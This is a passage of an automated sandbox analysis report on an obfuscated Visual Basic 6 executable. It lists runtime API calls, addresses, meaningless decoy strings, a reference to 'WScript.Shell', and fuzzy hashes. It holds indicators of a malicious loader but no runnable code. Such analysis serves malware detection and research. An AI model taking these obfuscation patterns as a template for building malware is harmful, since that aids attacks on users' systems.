                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$List$Copy$BstrCheckHresult$#512#536#538#539#553#574#610#612#618#629#632#669#696#702#711ErrorNew2Overflow
                                                                                                                                                      • String ID: Anslagskraftens$Leona$N$NEGLIGERS$Operationalise$PREFAVOURABLY$SIDESTILLER$Toothed$sphagnumets
                                                                                                                                                      • API String ID: 1098405350-3309045338
                                                                                                                                                      • Opcode ID: c630fc53bfa4ed97c1d1d416e18143dc08e2fa76197760c80614a00b22123062
                                                                                                                                                      • Instruction ID: 619195fb2b5566fb5b21aa5d9deb070e07f84790da865bf45a13783e1b4f6e3b
                                                                                                                                                      • Opcode Fuzzy Hash: c630fc53bfa4ed97c1d1d416e18143dc08e2fa76197760c80614a00b22123062
                                                                                                                                                      • Instruction Fuzzy Hash: 02F12BB1D00219ABDB04DFE4DD89ADDBBB8FF48700F10812AE516B72A4DB745A49CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • #610.MSVBVM60(?), ref: 0041EC41
                                                                                                                                                      • #553.MSVBVM60(?,?), ref: 0041EC4F
                                                                                                                                                      • #648.MSVBVM60(?), ref: 0041EC67
                                                                                                                                                      • __vbaVarTstLt.MSVBVM60(?,?), ref: 0041EC89
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,0000000A,?), ref: 0041ECA5
                                                                                                                                                      • #539.MSVBVM60(?,000000FB,000000A8,000000D6), ref: 0041ECC6
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041ECD6
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041ECE3
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041ECE8
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041ED16
                                                                                                                                                      • #629.MSVBVM60(0000000A,?,000000E5,00000002), ref: 0041ED2D
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(0000000A), ref: 0041ED37
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041ED3E
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,0000000A), ref: 0041ED4E
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041ED75
                                                                                                                                                      • #524.MSVBVM60(?,?), ref: 0041ED83
                                                                                                                                                      • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041ED97
                                                                                                                                                      • #523.MSVBVM60(00000000), ref: 0041ED9A
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EDA5
                                                                                                                                                      • #696.MSVBVM60(00000000), ref: 0041EDA8
                                                                                                                                                      • #698.MSVBVM60(0000000A,00000000), ref: 0041EDB6
                                                                                                                                                      • #518.MSVBVM60(?,0000000A), ref: 0041EDC4
                                                                                                                                                      • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041EDD2
                                                                                                                                                      • #527.MSVBVM60(00000000), ref: 0041EDD5
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EDE0
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(konkurrencedygtige,00000000), ref: 0041EDE8
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0041EE0A
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000004,?,?,0000000A,?), ref: 0041EE22
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041EE50
                                                                                                                                                      • #717.MSVBVM60(?,?,00000080,00000000), ref: 0041EE61
                                                                                                                                                      • __vbaVar2Vec.MSVBVM60(?,?), ref: 0041EE6F
                                                                                                                                                      • __vbaAryMove.MSVBVM60(?,?), ref: 0041EE7D
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041EE8D
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041EEAC
                                                                                                                                                      • #619.MSVBVM60(?,?,00000014), ref: 0041EEB8
                                                                                                                                                      • #520.MSVBVM60(0000000A,?), ref: 0041EEC6
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(0000000A), ref: 0041EED0
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EEDB
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,?,0000000A), ref: 0041EEEB
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041EF59), ref: 0041EF40
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041EF48
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041EF51
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041EF56
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$List$#518#520#523#524#527#539#553#610#619#629#648#696#698#717DestructVar2
                                                                                                                                                      • String ID: Doernes2$Krag4$UOPLYSTHEDS$\$hearsay$konkurrencedygtige
                                                                                                                                                      • API String ID: 1351758486-1457662506
                                                                                                                                                      • Opcode ID: bcd9c481ca9dbd07cfc3f840c2be69661c4f87d3e6035f966cbaa0f33183c1ea
                                                                                                                                                      • Instruction ID: 6ed5db7314f4084a728e08582945a58ac84eefb6c67ebfb851d5e04832b82301
                                                                                                                                                      • Opcode Fuzzy Hash: bcd9c481ca9dbd07cfc3f840c2be69661c4f87d3e6035f966cbaa0f33183c1ea
                                                                                                                                                      • Instruction Fuzzy Hash: EFB1F9B2C002199BDB14DFE4DE84EDEBBB8FB48700F10811AE506B7154DB746A49CFA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041E399
                                                                                                                                                      • #514.MSVBVM60(?,00000009), ref: 0041E3A5
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E3B6
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(Lifestyle4,00000000), ref: 0041E3BE
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E3D0
                                                                                                                                                      • __vbaStrCat.MSVBVM60(Fluxroot,?), ref: 0041E3EA
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E3F1
                                                                                                                                                      • __vbaStrCat.MSVBVM60(Certif,00000000), ref: 0041E3F9
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E400
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E405
                                                                                                                                                      • #717.MSVBVM60(?,?,00000040,00000000), ref: 0041E423
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041E42D
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E438
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E43D
                                                                                                                                                      • #698.MSVBVM60(?,00002742), ref: 0041E454
                                                                                                                                                      • __vbaVarTstEq.MSVBVM60(?,?), ref: 0041E470
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E47F
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041E4B5
                                                                                                                                                      • #632.MSVBVM60(?,?,000000CB,?), ref: 0041E4CC
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041E4D6
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E4E1
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041E4F1
                                                                                                                                                      • #696.MSVBVM60(Hanebaand), ref: 0041E4FF
                                                                                                                                                      • #713.MSVBVM60(UNCLEANER,?), ref: 0041E515
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E520
                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041E523
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E52A
                                                                                                                                                      • #651.MSVBVM60(?,00000000), ref: 0041E531
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E53C
                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041E53F
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E546
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041E556
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E562
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?,0041E5C7), ref: 0041E5A1
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E5B0
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E5B5
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E5BA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Move$Free$List$#514#632#651#696#698#713#717CopyDestruct
                                                                                                                                                      • String ID: A$Certif$Epharmonic$Fluxroot$Hanebaand$Kisteklder$Lifestyle4$UNCLEANER$wanness
                                                                                                                                                      • API String ID: 1225124453-3253074281
                                                                                                                                                      • Opcode ID: 11756a7145e70ebdfdf651005c01d662b05c865a73cadb1ffc4d30b73b4c1e91
                                                                                                                                                      • Instruction ID: 85cfcd5c77c2aec3e891b78752cd5a7d2c5993808130f8995984a85c909f5de0
                                                                                                                                                      • Opcode Fuzzy Hash: 11756a7145e70ebdfdf651005c01d662b05c865a73cadb1ffc4d30b73b4c1e91
                                                                                                                                                      • Instruction Fuzzy Hash: 0F71C5B5D00208ABDB04DFE5DD849EEBBB8FF58301F10812AE506B72A4DB745A89CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • __vbaChkstk.MSVBVM60(?,00401386), ref: 0041F21E
                                                                                                                                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401386), ref: 0041F257
                                                                                                                                                      • #646.MSVBVM60(0000000A), ref: 0041F276
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F281
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(ANCHIETEA,00000000), ref: 0041F28D
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F2A2
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041F2AB
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041F2D7
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040339C,00000014), ref: 0041F328
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000078), ref: 0041F370
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041F393
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041F3B3
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040339C,00000014), ref: 0041F404
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000138), ref: 0041F455
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041F470
                                                                                                                                                      • __vbaOnError.MSVBVM60(000000FF), ref: 0041F47F
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041F494
                                                                                                                                                      • #618.MSVBVM60(?,000000F9), ref: 0041F4AA
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F4B5
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(Eighteenth4,00000000), ref: 0041F4C1
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F4D5
                                                                                                                                                      • #616.MSVBVM60(Skdyrets5,00000037), ref: 0041F4F5
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F500
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041F519
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040339C,00000014), ref: 0041F56A
                                                                                                                                                      • __vbaStrMove.MSVBVM60(00000001), ref: 0041F5A3
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000138), ref: 0041F5D6
                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 0041F5F8
                                                                                                                                                      • __vbaFreeObj.MSVBVM60(?,?,00401386), ref: 0041F604
                                                                                                                                                      • #702.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041F62B
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F636
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041F63F
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041F69B), ref: 0041F682
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F68B
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F694
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$CheckHresult$Move$New2$Copy$#616#618#646#702ChkstkErrorList
                                                                                                                                                      • String ID: ANCHIETEA$Eighteenth4$Skdyrets5$UNFACTUALNESS$hjreparentesernes
                                                                                                                                                      • API String ID: 2120662567-2651150714
                                                                                                                                                      • Opcode ID: 440854f701d1ac5518b5c67c70b3024554193268f1dee532f3d93b72497ac5df
                                                                                                                                                      • Instruction ID: 9c81a08efbc458a56486b3bccad7c80358eaf98f123583cf4d62379da1fbc287
                                                                                                                                                      • Opcode Fuzzy Hash: 440854f701d1ac5518b5c67c70b3024554193268f1dee532f3d93b72497ac5df
                                                                                                                                                      • Instruction Fuzzy Hash: 24D12D74A00318DFDB14DFA0D948BDDBBB4BF48705F20816AE506BB2A1DB745A85CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$List$#518#536#561#619#631#716AddrefCopy
                                                                                                                                                      • String ID: Korrektrernes5$NONVENOMOUSNESS$STUBCHEN$Skibakkerne$WScript.Shell$klovdyr$v
                                                                                                                                                      • API String ID: 1348390723-3911151726
                                                                                                                                                      • Opcode ID: f2ea3b4a58298805e3a474dcff101e822541a89d7113bda211a1523e9c8cea8b
                                                                                                                                                      • Instruction ID: 9d4dc52f1e133472b1b2247dafdf3e12305d3b6978b84aa4e67fb766f95605d5
                                                                                                                                                      • Opcode Fuzzy Hash: f2ea3b4a58298805e3a474dcff101e822541a89d7113bda211a1523e9c8cea8b
                                                                                                                                                      • Instruction Fuzzy Hash: E661E9B5C00259ABDB04DFA4D9889DEBFB8FF58704F10412AE506B72A0DB746689CF94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • #536.MSVBVM60(?), ref: 0041EFE4
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041EFEF
                                                                                                                                                      • #581.MSVBVM60(00000000), ref: 0041EFF6
                                                                                                                                                      • __vbaLenBstr.MSVBVM60(HOMESTAY), ref: 0041F007
                                                                                                                                                      • __vbaFpR8.MSVBVM60 ref: 0041F025
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F04A
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041F04F
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041F074
                                                                                                                                                      • #607.MSVBVM60(?,00000013,00000003), ref: 0041F084
                                                                                                                                                      • __vbaStrVarVal.MSVBVM60(?,?), ref: 0041F092
                                                                                                                                                      • #690.MSVBVM60(ENTROCHITE,GYROVAGUE,Valvulate7,00000000), ref: 0041F0A8
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041F0B1
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,00000003,?), ref: 0041F0C3
                                                                                                                                                      • #660.MSVBVM60(?,00000003,?,00000001,00000001), ref: 0041F0F4
                                                                                                                                                      • #520.MSVBVM60(?,?), ref: 0041F102
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041F10C
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041F117
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000004,00000003,0000000A,?,?), ref: 0041F12F
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041F146
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,02BEEA7C,0040339C,0000004C), ref: 0041F16B
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033BC,00000028), ref: 0041F18B
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041F194
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041F1DA), ref: 0041F1D3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$CheckHresultList$#520#536#581#607#660#690BstrNew2
                                                                                                                                                      • String ID: ENTROCHITE$GYROVAGUE$HOMESTAY$Valvulate7
                                                                                                                                                      • API String ID: 4190706326-1299342816
                                                                                                                                                      • Opcode ID: 8f5b987e35f2ec7606d35262231ce329ce6383a57d20b8e20ebac44b1bcd4f25
                                                                                                                                                      • Instruction ID: 0963c0ff5cca27f308fad6ac89051ad50f40e35da3b53a542090e021b5ef2dd2
                                                                                                                                                      • Opcode Fuzzy Hash: 8f5b987e35f2ec7606d35262231ce329ce6383a57d20b8e20ebac44b1bcd4f25
                                                                                                                                                      • Instruction Fuzzy Hash: B16129B1900219EBCB00DFA4DD88EEEBBB8FF58705F10416AE545B61A0DBB4594ACF64
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 0041E889
                                                                                                                                                      • __vbaVarDup.MSVBVM60 ref: 0041E8A3
                                                                                                                                                      • #666.MSVBVM60(?,?), ref: 0041E8B1
                                                                                                                                                      • __vbaStrVarMove.MSVBVM60(?), ref: 0041E8BB
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E8CC
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041E8D8
                                                                                                                                                      • #618.MSVBVM60(?,00000091), ref: 0041E8EA
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E8F5
                                                                                                                                                      • __vbaStrCmp.MSVBVM60(Lancetbladet6,00000000), ref: 0041E8FD
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E90F
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041E930
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,02BEEA7C,0040339C,00000014), ref: 0041E955
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,00000138), ref: 0041E982
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041E98B
                                                                                                                                                      • #702.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 0041E9AB
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E9B6
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E9BB
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041EA04), ref: 0041E9F7
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E9FC
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041EA01
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Move$CheckHresult$#618#666#702CopyListNew2
                                                                                                                                                      • String ID: Lancetbladet6$uvisneligheden$windir
                                                                                                                                                      • API String ID: 2448542732-203791292
                                                                                                                                                      • Opcode ID: d29c39177f904c345bc64b0d315ba15e092f5b7a5a24d43128f5d1073ad88c52
                                                                                                                                                      • Instruction ID: 47aa1b165fb1252179dd167978bfb3766ac59c33a5509a7222df503a4470d44a
                                                                                                                                                      • Opcode Fuzzy Hash: d29c39177f904c345bc64b0d315ba15e092f5b7a5a24d43128f5d1073ad88c52
                                                                                                                                                      • Instruction Fuzzy Hash: 83416375900219EBCB00DF95DE899DEBBB8FF58705F204226F512B32A0DB745A45CF94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Construct2Destruct
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3342376363-0
                                                                                                                                                      • Opcode ID: 9fd6025e0b370815ac1b5673e180d7e23d0960f1d88fd19cd6d6d6df87afb83b
                                                                                                                                                      • Instruction ID: 02524ba4e16dbb763d465f474a7e9bc432b50fbab4924b42f19f87021a701a45
                                                                                                                                                      • Opcode Fuzzy Hash: 9fd6025e0b370815ac1b5673e180d7e23d0960f1d88fd19cd6d6d6df87afb83b
                                                                                                                                                      • Instruction Fuzzy Hash: 83418374E052899FDB04DBE8C4507AEFF76AF98300F14C19F895157383CA79990ACBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • __vbaVarDup.MSVBVM60(-00000001,00000000,6FA0D8B1), ref: 0041E1AE
                                                                                                                                                      • #632.MSVBVM60(?,?,000000E6,00000002), ref: 0041E1C5
                                                                                                                                                      • __vbaVarTstEq.MSVBVM60(?,?), ref: 0041E1EA
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,?), ref: 0041E206
                                                                                                                                                      • #536.MSVBVM60(?), ref: 0041E226
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E237
                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 0041E23C
                                                                                                                                                      • __vbaLenBstrB.MSVBVM60(Operationalise), ref: 0041E255
                                                                                                                                                      • #574.MSVBVM60(00000003,0000000A,000000FF,00000000), ref: 0041E270
                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041E27B
                                                                                                                                                      • #711.MSVBVM60(?,00000000), ref: 0041E282
                                                                                                                                                      • __vbaAryVar.MSVBVM60(00002008,?), ref: 0041E291
                                                                                                                                                      • __vbaAryCopy.MSVBVM60(?,?), ref: 0041E2A8
                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041E2B1
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003,00000003,0000000A,?), ref: 0041E2C5
                                                                                                                                                      • #554.MSVBVM60 ref: 0041E2CA
                                                                                                                                                      • __vbaFreeStr.MSVBVM60(0041E312), ref: 0041E2FF
                                                                                                                                                      • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041E30B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$ListMove$#536#554#574#632#711BstrCopyDestruct
                                                                                                                                                      • String ID: NEGLIGERS$Operationalise$PREFAVOURABLY
                                                                                                                                                      • API String ID: 398136637-198126775
                                                                                                                                                      • Opcode ID: d2f11c0ce752d2bd4cabba61ce92aac43d7a43ccd7c6074f04afe587d5876be8
                                                                                                                                                      • Instruction ID: 38f994a8dfd74e6f1cad4b032ee14f29bc86f162e9263eb00b9369606973fe45
                                                                                                                                                      • Opcode Fuzzy Hash: d2f11c0ce752d2bd4cabba61ce92aac43d7a43ccd7c6074f04afe587d5876be8
                                                                                                                                                      • Instruction Fuzzy Hash: 82510CB1C00209AFDB04DFE4D949AEEBBB8FB48704F10C16AE515B72A0DB741649CFA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
